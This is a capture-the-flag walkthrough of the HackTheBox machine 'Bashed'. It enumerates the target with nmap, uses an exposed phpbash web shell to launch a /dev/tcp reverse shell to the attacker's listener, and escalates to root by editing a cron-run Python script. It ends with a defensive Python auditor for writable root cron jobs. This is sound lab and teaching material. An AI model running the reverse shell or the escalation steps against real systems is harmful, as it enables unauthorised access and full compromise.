Bashed

#Linux #Enumeration #Web-Fuzzing

Bashed is an easy-rated Linux machine from HackTheBox created by Arrexel. It is an unusually open machine, which makes it pretty straightforward: you can get in quickly and then escalate privileges with something that is worth trying (I was lucky here). In this post, my IP is 10.10.14.12 and the target’s IP is 10.129.148.58.

Gather Information

Local Terminal
nmap -sS -p- --open --min-rate 5000 -vvv -n -Pn 10.129.148.58
Only port 80? Just a website?
Local Terminal
nmap -sCV -p 80 10.129.148.58
Nothing special so far.
Local Terminal
nmap --script http-enum -p80 10.129.148.58
A lot of default directories.

Add those directories to your notes; we will explore them soon. {Directories: /css/ /dev/ /images/ /js/ /php/ /uploads/}

Local Terminal
whatweb http://10.129.148.58
Nothing again.

Now we must check the structure of the website with our browser.

  • Browser: http://10.129.148.58

The source code shows single.html; we should add it to our directory list.
  • Browser: http://10.129.148.58/css/

We can navigate through the folders, but there is nothing here.
  • Browser: http://10.129.148.58/dev/

Phpbash, what a curious name; let’s visit it.
  • Browser: http://10.129.148.58/dev/phpbash.php

We have… a bash? This will save us a lot of work.

Exploitation

Time to get a reverse shell using our browser terminal [BrowserTerm] at /dev/phpbash.php and a local terminal [Term].

Local Terminal
nc -nlvp 443
Browser Terminal
bash -c "bash -i >%26 /dev/tcp/10.10.14.12/443 0%261"
Now your local terminal [Term] is [www-data].

After this, we need a TTY treatment to make the shell easier to work with.

Target Terminal [www-data]
cd /
find -name user.txt 2>/dev/null
cat user.txt
We have the first flag.

Privilege Escalation

Target Terminal [www-data]
id
sudo -l
sudo -u scriptmanager whoami
We can run every command as “scriptmanager”? The user name is a clear clue; let’s switch user.
Target Terminal [www-data]
sudo -u scriptmanager bash
From [www-data] to [scriptmanager]


Target Term [ScriptManager]
id
sudo -l
uname -a
lsb_release -a
Searching for information, there is nothing relevant here. Our alternative is to follow the clue and go to the scripts directory.
Target Term [ScriptManager]
ls
cd scripts
So, as scriptmanager we can read and write test.py, but root is modifying test.txt… How?
Target Term [ScriptManager]
nano test.py
New content of test.py
Target Term [ScriptManager]
cat test.txt

Wait, it changed? That means test.py is related to test.txt, and root is executing test.py (discovered with ls -la).

Target Term [ScriptManager]
nano test.py
Newest content of test.py: a script that allows every user to run /bin/bash as root.
Target Term [ScriptManager]
cat test.txt
We have the signal, perfect. That was worth testing.
Target Term [ScriptManager]
bash -p
Target Terminal [root]
cat /root/root.txt
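The whole escalation works because root periodically runs a script from a directory that scriptmanager owns. Here is an added audit, not part of the original writeup, that a defender can run to spot exactly that misconfiguration: it parses /etc/crontab-style job lines and flags root jobs whose referenced file, or the directory holding it, is owned by a non-root user or is group/world writable. The crontab text and the (uid, mode) metadata are constructed samples; the real cron entry on the box is not shown in the post.

```python
import posixpath
import re
import stat

# System crontab job line: five time fields (or an @reboot-style tag), the user, then the command.
SYSTEM_CRON = re.compile(r"^\s*(?:@\w+\s+|(?:\S+\s+){5})(\S+)\s+(.+)$")
ABS_PATH = re.compile(r"(?<![\w./-])(/[\w./-]+)")  # absolute paths inside the command

def parse_system_crontab(text):
    """Return (user, command) pairs; comments, blanks and VAR=value lines do not match."""
    jobs = []
    for line in text.splitlines():
        m = SYSTEM_CRON.match(line.strip())
        if m and not line.lstrip().startswith("#"):
            jobs.append((m.group(1), m.group(2)))
    return jobs

def risk_for_path(path, lookup):
    """Why a non-root user could alter `path`, or None. `lookup(path)` -> (uid, mode) or None."""
    info = lookup(path)
    if info is None:
        return None
    uid, mode = info
    if uid != 0:
        return f"{path} owned by uid {uid}, not root"
    if mode & (stat.S_IWGRP | stat.S_IWOTH):  # conservative: group write counts too
        return f"{path} is group/world writable (mode {oct(mode & 0o777)})"
    return None

def find_risky_jobs(crontab_text, lookup):
    """Root jobs referencing a file, or a directory, that a non-root user can modify."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for path in ABS_PATH.findall(command):
            for p in dict.fromkeys([path, posixpath.dirname(path)]):  # file, then its directory
                reason = risk_for_path(p, lookup)
                if reason:
                    findings.append((command, reason))
    return findings

# Constructed sample: crontab text plus fake (uid, mode) metadata modelled on the scripts directory.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
* * * * * root cd /scripts; for f in *.py; do python "$f"; done
* * * * * root /usr/local/bin/backup.sh
"""
SAMPLE_FS = {"/": (0, 0o755), "/scripts": (1001, 0o755),
             "/usr/local/bin": (0, 0o755), "/usr/local/bin/backup.sh": (0, 0o777)}
```

To audit a live host, call find_risky_jobs with the contents of /etc/crontab and a lookup that wraps os.stat (returning st_uid and st_mode, or None on OSError) instead of SAMPLE_FS.get.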
